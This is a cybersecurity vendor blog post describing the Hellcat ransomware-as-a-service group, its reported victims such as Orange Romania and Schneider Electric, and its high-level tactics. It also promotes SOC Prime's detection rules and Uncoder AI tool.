Ransomware remains a top cybersecurity threat, with attack costs soaring to $2.73 million per incident, nearly $1 million higher than in 2023, according to Sophos. As ransomware operations grow in complexity, new threat groups continue to emerge, seeking massive financial gains. One such group is Hellcat, a newly identified Ransomware-as-a-Service (RaaS) threat group first spotted in late 2024.
Hellcat has quickly made a name for itself with high-profile intrusions across various industries, targeting critical national infrastructure, major corporations, and government entities. The group has already claimed responsibility for attacks on breaches at Schneider Electric, Telefónica, Pinger, and Israel’s Knesset. Last week, Orange Group confirmed a security breach in its Romanian operations after a Hellcat affiliate leaked thousands of internal files, including employee records.
Hellcat Ransomware Group Attacks Detection
As Cybersecurity Ventures predicts, ransomware attacks will occur every two seconds by 2031, making proactive detection essential for cyber defenders. The newly emerged Hellcat ransomware group poses a novel menace, further amplifying this disturbing trend. To spot potential intrusions at the earliest stages, the SOC Prime Platform for collective cyber defense provides a global active threats feed of real-time threat intelligence and relevant detection rules, backed by a complete product suite for automated threat hunting, AI-powered detection engineering, and advanced threat detection.
Hit the Explore Detections button below to immediately drill down to a dedicated rule stack addressing Hellcat ransomware attacks. All the rules are compatible with multiple SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK framework. Additionally, every rule is enriched with extensive metadata, including threat intel references, attack timelines, triage recommendations, and more.
Security professionals seeking for more detection content covering ransomware attacks globally might search Threat Detection Marketplace with “Ransomware” tag to support their investigation.
Also, security experts might use Uncoder AI, the industry-first AI co-pilot for Detection Engineering, to instantly hunt for indicators of compromise provided in Bridewell research on Hellcat ransomware. Uncoder AI acts as an IOC packager, enabling cyber defenders to effortlessly interpret IOCs and generate tailored hunting queries. These queries can then be seamlessly integrated into their preferred SIEM or EDR systems for immediate execution.
Hellcat Ransomware Attacks Analysis
In late December 2024, security researchers identified the emergence of a new ransomware-as-a-service collective operating under the name Hellcat. Before the group’s official formation, Hellcat members were observed carrying out individual attacks on prominent IT companies, including Dell and CapGemini. Later, in Q4 2024, the group began operating collectively, targeting high-profile organizations such as Israel’s Knesset, Schneider Electric, Telefónica, and others.
Hellcat operators employ a range of sophisticated techniques for gaining initial access, notably through phishing and exploiting exposed public-facing applications. Once inside, they implement complex PowerShell infection chains to maintain persistence, bypass security defenses, and establish command-and-control channels, facilitating the installation and execution of SliverC2 malware.
According to the research by Bridewell, the Hellcat group demonstrates a high level of operational security, employing a variety of secure communication tools such as TOX, Session, encrypted hard drives, air-gapped systems, anonymous VPS, MullvadVPN, and XMPP to mask their activities. While the specific use of these methods within attacks remains unclear, they highlight the group’s discipline and expertise in avoiding detection. Additionally, Hellcat utilizes custom ransomware payloads to encrypt data, along with custom scripts and Living-off-the-Land (LotL) binaries to fly under the radar. Their unique exfiltration tactics leverage SFTP and cloud services, further showcasing their sophisticated approach to cyber intrusions.
Notably, security experts revealed a significant overlap between the ransomware payloads used by Hellcat and Morpheus, with similar ransom notes also shared by both groups, along with Underground Team. While analysts at SentinelOne identified nearly identical code in the Hellcat and Morpheus payloads, it’s unclear whether this points to collaboration or a shared source code. Both payloads also exhibit similar characteristics on VirusTotal, but there is insufficient evidence to confirm whether this overlap signifies coordination or the use of common templates.
Last week, a member of the Hellcat ransomware group announced the theft of thousands of internal documents from Orange Group, mostly originating from Orange’s Romanian branch. Orange confirmed the breach occurred on a non-critical application and is actively investigating to minimize its impact.
To proactively thwart sophisticated ransomware attacks, as well as any evolving threats, security teams can rely on SOC Prime Platform for collective cyber defense, offering an enterprise-ready product suite for building a future-proof cybersecurity strategy. Individual researchers can also gain personal access to SOC Prime Platform with new Solo subscriptions. Leverage Threat Detection Marketplace Solo for global threat feeds, tailored intel, and an extensive Sigma rule library, or use Uncoder AI Solo as a private IDE and co-pilot for detection engineering. Available now with 50% off annual plans via instant purchase using Stripe.
The post Detect Hellсat Ransomware Attacks: New Ransomware-as-a-Service Threat Group Targeting а Variety of High-Profile Organizations Globally appeared first on SOC Prime.
